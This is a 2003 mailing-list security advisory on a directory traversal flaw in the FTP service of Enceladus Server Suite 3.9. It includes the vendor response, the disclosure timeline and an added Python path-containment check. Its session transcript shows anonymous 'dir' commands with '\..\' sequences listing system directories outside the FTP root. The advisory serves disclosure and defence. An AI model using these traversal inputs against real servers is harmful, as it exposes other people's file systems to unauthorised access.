[VulnWatch] Directory Traversal vulnerability found in Enceladus Server Suite version 3.9

From: matrix@infowarfare.dk
Date: 01/21/03


                     Directory Traversal vulnerability found in
                          Enceladus Server Suite version 3.9
                                   (FTP Service)
                                                             
                             Discovered by Dennis Rand
                                www.Infowarfare.dk
    ------------------------------------------------------------------------

    SUMMARY
    Enceladus Server Suite is an Internet/Intranet lightweight Web and FTP Server
    for Windows that provides secure file sharing on any network! Perfect for
    Broadband, Cable Modem, Small business and Personal Use. You don't have to be
    an expert to set up file sharing or run your own web site and FTP Server!!
    This Server Suite is one of the easiest to install and operate!

    A directory traversal vulnerability in the product allows remote attackers to
    cause the server to traverse into directories that reside outside the
    bounding FTP root directory. The default installation includes an anonymous
    user, through which this can be used.

    DETAILS

    Vulnerable systems:
     Windows NT 4.0 and Windows 2000 server fully patched
     * Enceladus Server Suite version 3.9
     
    Immune systems:
     * Enceladus Web and FTP Server Suite V3.9.11

    Enceladus Server Suite version 3.9 fails to filter out "\.." and "/.."
    sequences in specific command requests, allowing remote users to break out
    of restricted directories and gain read access to the system directory
    structure. This makes it possible to discover the directory structure
    outside the configured areas.

    The following transcript demonstrates a sample exploitation of the
    vulnerabilities:

    Connected to 192.168.1.199.
    220 Mollensoft FTP Server Ready.
    User (192.168.1.199:(none)): anonymous
    331 Password required for anonymous.
    Password:
    230 User anonymous logged in.
    ftp> ls
    200 PORT command successful
    150 Opening ASCII mode data connection for /bin/ls.
    index.html
    readme.txt
    226 Listing complete.
    ftp: 24 bytes received in 0,00Seconds 24000,00Kbytes/sec.
    ftp> cd ..
    550 Access denied
    ftp> cd ...
    550 Access denied
    ftp> cd \..\
    550 Access denied
    ftp> cd/../
    Invalid command.
    ftp> cd /../
    550 Access denied
    ftp> ls /../
    200 PORT command successful
    150 Opening ASCII mode data connection for /bin/ls.
    226 Listing complete.
    ftp> ls /../../
    200 PORT command successful
    150 Opening ASCII mode data connection for /bin/ls.
    226 Listing complete.
    ftp> ls \..\..\
    200 PORT command successful
    150 Opening ASCII mode data connection for /bin/ls.
    226 Listing complete.
    ftp> dir \..\..\
    200 PORT command successful
    150 Opening ASCII mode data connection for /bin/ls.
    drwxr-xr-x 1 User Group 0 Jan 19 10:33 backup-html
    drwxr-xr-x 1 User Group 0 Jan 19 10:33 cgi-bin
    drwxr-xr-x 1 User Group 0 Jan 19 10:46 config
    -rwxr-xr-x 1 User Group 1016037 Mar 21 00:34 ENCELADUSHELP.CHM
    -rwxr-xr-x 1 User Group 241664 Nov 24 23:57 EnceladusServer3.9.exe
    drwxr-xr-x 1 User Group 0 Jan 19 10:33 html
    drwxr-xr-x 1 User Group 0 Jan 19 10:33 logs
    -rwxr-xr-x 1 User Group 30880 Jan 19 10:45 UNINSTAL.DAT
    drwxr-xr-x 1 User Group 0 Jan 19 10:33 users
    226 Listing complete.
    ftp: 619 bytes received in 0,00Seconds 619000,00Kbytes/sec.
    ftp> dir \..\..\..\..\..\..\..\
    200 PORT command successful
    150 Opening ASCII mode data connection for /bin/ls.
    -rwxr-xr-x 1 User Group 0 Dec 23 12:17 AUTOEXEC.BAT
    -rwxr-xr-x 1 User Group 278 Jan 18 08:49 boot.ini
    -rwxr-xr-x 1 User Group 0 Dec 23 12:17 CONFIG.SYS
    drwxr-xr-x 1 User Group 0 Jan 19 10:33 enceladus
    -rwxr-xr-x 1 User Group 5135127 Jan 19 10:32 EnceladusServerSuiteDemoV3.1.EXE
    drwxr-xr-x 1 User Group 0 Dec 23 12:25 I386
    drwxr-xr-x 1 User Group 0 Dec 23 22:22 Inetpub
    drwxr-xr-x 1 User Group 0 Dec 23 21:49 Installationsfiler til Windows Update
    -rwxr-xr-x 1 User Group 0 Dec 23 12:17 IO.SYS
    -rwxr-xr-x 1 User Group 0 Dec 23 12:17 MSDOS.SYS
    drwxr-xr-x 1 User Group 0 Dec 23 21:25 Multimedia Files
    -rwxr-xr-x 1 User Group 26816 Dec 23 22:30 NTDETECT.COM
    -rwxr-xr-x 1 User Group 156496 Dec 23 22:30 ntldr
    drwxr-xr-x 1 User Group 0 Dec 23 12:36 OptionPack
    -rwxr-xr-x 1 User Group 524288000 Jan 19 10:35 pagefile.sys
    drwxr-xr-x 1 User Group 0 Jan 19 10:19 Program Files
    drwxr-xr-x 1 User Group 0 Dec 23 12:24 RECYCLER
    drwxr-xr-x 1 User Group 0 Jan 19 10:45 TEMP
    drwxr-xr-x 1 User Group 0 Jan 19 10:36 WINNT
    226 Listing complete.
    ftp: 1340 bytes received in 0,13Seconds 10,31Kbytes/sec.
    ftp> dir /../../../
    200 PORT command successful
    150 Opening ASCII mode data connection for /bin/ls.
    -rwxr-xr-x 1 User Group 0 Dec 23 12:17 AUTOEXEC.BAT
    -rwxr-xr-x 1 User Group 278 Jan 18 08:49 boot.ini
    -rwxr-xr-x 1 User Group 0 Dec 23 12:17 CONFIG.SYS
    drwxr-xr-x 1 User Group 0 Jan 19 10:33 enceladus
    -rwxr-xr-x 1 User Group 5135127 Jan 19 10:32 EnceladusServerSuiteDemoV3.1.EXE
    drwxr-xr-x 1 User Group 0 Dec 23 12:25 I386
    drwxr-xr-x 1 User Group 0 Dec 23 22:22 Inetpub
    drwxr-xr-x 1 User Group 0 Dec 23 21:49 Installationsfiler til Windows Update
    -rwxr-xr-x 1 User Group 0 Dec 23 12:17 IO.SYS
    -rwxr-xr-x 1 User Group 0 Dec 23 12:17 MSDOS.SYS
    drwxr-xr-x 1 User Group 0 Dec 23 21:25 Multimedia Files
    -rwxr-xr-x 1 User Group 26816 Dec 23 22:30 NTDETECT.COM
    -rwxr-xr-x 1 User Group 156496 Dec 23 22:30 ntldr
    drwxr-xr-x 1 User Group 0 Dec 23 12:36 OptionPack
    -rwxr-xr-x 1 User Group 524288000 Jan 19 10:35 pagefile.sys
    drwxr-xr-x 1 User Group 0 Jan 19 10:19 Program Files
    drwxr-xr-x 1 User Group 0 Dec 23 12:24 RECYCLER
    drwxr-xr-x 1 User Group 0 Jan 19 10:45 TEMP
    drwxr-xr-x 1 User Group 0 Jan 19 10:36 WINNT
    226 Listing complete.
    ftp: 1340 bytes received in 0,14Seconds 9,57Kbytes/sec.
    ftp> bye
    221 Goodbye.
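
    The transcript shows the path check being applied to "cd" but not to
    "ls"/"dir". The following is an added example, not code from the advisory
    or from MollenSoft, of one containment check shared by every command that
    takes a path; FTP_ROOT, PATH_COMMANDS and the function names are assumptions.

```python
FTP_ROOT = "C:/enceladus/ftproot"  # assumed root, for illustration only

# Every verb that carries a path goes through the same check. The advisory's
# transcript shows CWD being denied while LIST/NLST (ls, dir) were not.
PATH_COMMANDS = {"CWD", "LIST", "NLST", "RETR", "STOR", "DELE", "MKD", "RMD"}


class PathEscape(Exception):
    """Raised when a client-supplied path would leave the FTP root."""


def resolve(cwd, arg):
    """Resolve arg against the virtual directory cwd ("/" is the FTP root)."""
    arg = arg.replace("\\", "/")       # Windows accepts both separators
    if "\x00" in arg or ":" in arg:    # NUL bytes, drive letters, streams
        raise PathEscape(arg)
    parts = [] if arg.startswith("/") else [p for p in cwd.split("/") if p]
    for seg in arg.split("/"):
        if seg in ("", "."):
            continue
        if seg.strip(". ") == "":      # "..", "...", ".. " and similar
            if seg != ".." or not parts:
                raise PathEscape(arg)  # would climb above the root
            parts.pop()
        else:
            parts.append(seg)
    return "/" + "/".join(parts)


def to_real(virtual):
    """Map an already-resolved virtual path onto the real file system."""
    return FTP_ROOT + ("" if virtual == "/" else virtual)


def handle(cwd, line):
    """Return (allowed, virtual_path) for one command line from a client."""
    verb, _, arg = line.strip().partition(" ")
    if verb.upper() not in PATH_COMMANDS:
        return (False, None)
    try:
        return (True, resolve(cwd, arg))
    except PathEscape:
        return (False, None)           # server answers "550 Access denied"
```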

    Detection:
    Enceladus Server Suite version 3.9 is vulnerable to the above-described
    attacks. Earlier versions may be susceptible as well. To determine if a
    specific implementation is vulnerable, experiment by following the above
    transcript.

    Vendor response:
    Good thing you can't "put" or "get" any files... Thanks for the heads up, I
    thought I had fixed the directory listing. Not too much harm in getting a
    directory listing (still needs to be fixed).

    Support
    Enceladus Web and FTP Server Suite V3.9.11
    The latest version is available from http://www.mollensoft.com/product3.htm

    Disclosure timeline:
    19/01/2003 Found the Vulnerability.
    19/01/2003 Author notified. Sent mail to support@mollensoft.com
    21/01/2003 Responses received from MollenSoft
    21/01/2003 Public Disclosure.

    ADDITIONAL INFORMATION
    The vulnerability was discovered by Dennis Rand <matrix@infowarfare.dk>

    DISCLAIMER:
    The information in this bulletin is provided "AS IS" without warranty of any
    kind. In no event shall we be liable for any damages whatsoever including
    direct, indirect, incidental, consequential, loss of business profits or
    special damages.
